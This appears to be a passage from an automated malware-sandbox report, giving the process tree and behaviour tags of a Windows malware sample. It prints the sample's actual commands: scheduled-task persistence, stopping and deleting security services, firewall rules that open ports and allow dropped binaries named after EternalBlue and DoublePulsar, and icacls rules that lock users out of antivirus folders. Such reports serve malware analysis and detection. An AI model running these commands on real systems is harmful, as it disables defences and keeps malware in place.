- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
C:\Programdata\WindowsTask\winlogon.exeC:\Programdata\WindowsTask\winlogon.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /C schtasks /query /fo list6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /query /fo list7⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig /flushdns5⤵
-
C:\Windows\system32\ipconfig.exeipconfig /flushdns6⤵
- Gathers network information
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c gpupdate /force5⤵
-
C:\Windows\system32\gpupdate.exegpupdate /force6⤵
-
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 14⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST4⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat4⤵
- Drops file in Drivers directory
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat4⤵
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 5 /NOBREAK5⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 3 /NOBREAK5⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM 1.exe /T /F5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM P.exe /T /F5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows5⤵
- Views/modifies file attributes
-
-
-
-
-
C:\programdata\install\ink.exeC:\programdata\install\ink.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc start appidsvc2⤵
-
C:\Windows\SysWOW64\sc.exesc start appidsvc3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc start appmgmt2⤵
-
C:\Windows\SysWOW64\sc.exesc start appmgmt3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config appidsvc start= auto2⤵
-
C:\Windows\SysWOW64\sc.exesc config appidsvc start= auto3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config appmgmt start= auto2⤵
-
C:\Windows\SysWOW64\sc.exesc config appmgmt start= auto3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete swprv2⤵
-
C:\Windows\SysWOW64\sc.exesc delete swprv3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop mbamservice2⤵
-
C:\Windows\SysWOW64\sc.exesc stop mbamservice3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop bytefenceservice2⤵
-
C:\Windows\SysWOW64\sc.exesc stop bytefenceservice3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete bytefenceservice2⤵
-
C:\Windows\SysWOW64\sc.exesc delete bytefenceservice3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete mbamservice2⤵
-
C:\Windows\SysWOW64\sc.exesc delete mbamservice3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete crmsvc2⤵
-
C:\Windows\SysWOW64\sc.exesc delete crmsvc3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete "windows node"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\sc.exesc delete "windows node"3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer2⤵
-
C:\Windows\SysWOW64\sc.exesc stop Adobeflashplayer3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer2⤵
-
C:\Windows\SysWOW64\sc.exesc delete AdobeFlashPlayer3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop MoonTitle2⤵
-
C:\Windows\SysWOW64\sc.exesc stop MoonTitle3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete MoonTitle"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete MoonTitle"3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop AudioServer2⤵
-
C:\Windows\SysWOW64\sc.exesc stop AudioServer3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete AudioServer"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete AudioServer"3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_642⤵
-
C:\Windows\SysWOW64\sc.exesc stop clr_optimization_v4.0.30318_643⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete clr_optimization_v4.0.30318_64"3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql2⤵
-
C:\Windows\SysWOW64\sc.exesc stop MicrosoftMysql3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql2⤵
-
C:\Windows\SysWOW64\sc.exesc delete MicrosoftMysql3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set allprofiles state on3⤵
- Modifies Windows Firewall
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN3⤵
- Modifies Windows Firewall
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN3⤵
- Modifies Windows Firewall
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN3⤵
- Modifies Windows Firewall
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN3⤵
- Modifies Windows Firewall
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes3⤵
- Modifies Windows Firewall
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes3⤵
- Modifies Windows Firewall
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes3⤵
- Modifies Windows Firewall
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes3⤵
- Modifies Windows Firewall
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes3⤵
- Modifies Windows Firewall
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes3⤵
- Modifies Windows Firewall
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes3⤵
- Modifies Windows Firewall
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes3⤵
- Modifies Windows Firewall
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes3⤵
- Modifies Windows Firewall
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes3⤵
- Modifies Windows Firewall
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes3⤵
- Modifies Windows Firewall
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes3⤵
- Modifies Windows Firewall
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN3⤵
- Modifies Windows Firewall
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN3⤵
- Modifies Windows Firewall
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out3⤵
- Modifies Windows Firewall
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out3⤵
- Modifies Windows Firewall
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\svchost.exe" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Zaxar" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls c:\programdata\Malwarebytes /deny Admin:(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls c:\programdata\Malwarebytes /deny System:(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\MB3Install /deny Admin:(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\MB3Install /deny System:(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\Indus /deny System:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Driver Foundation Visions VHG" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\KVRT_Data /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
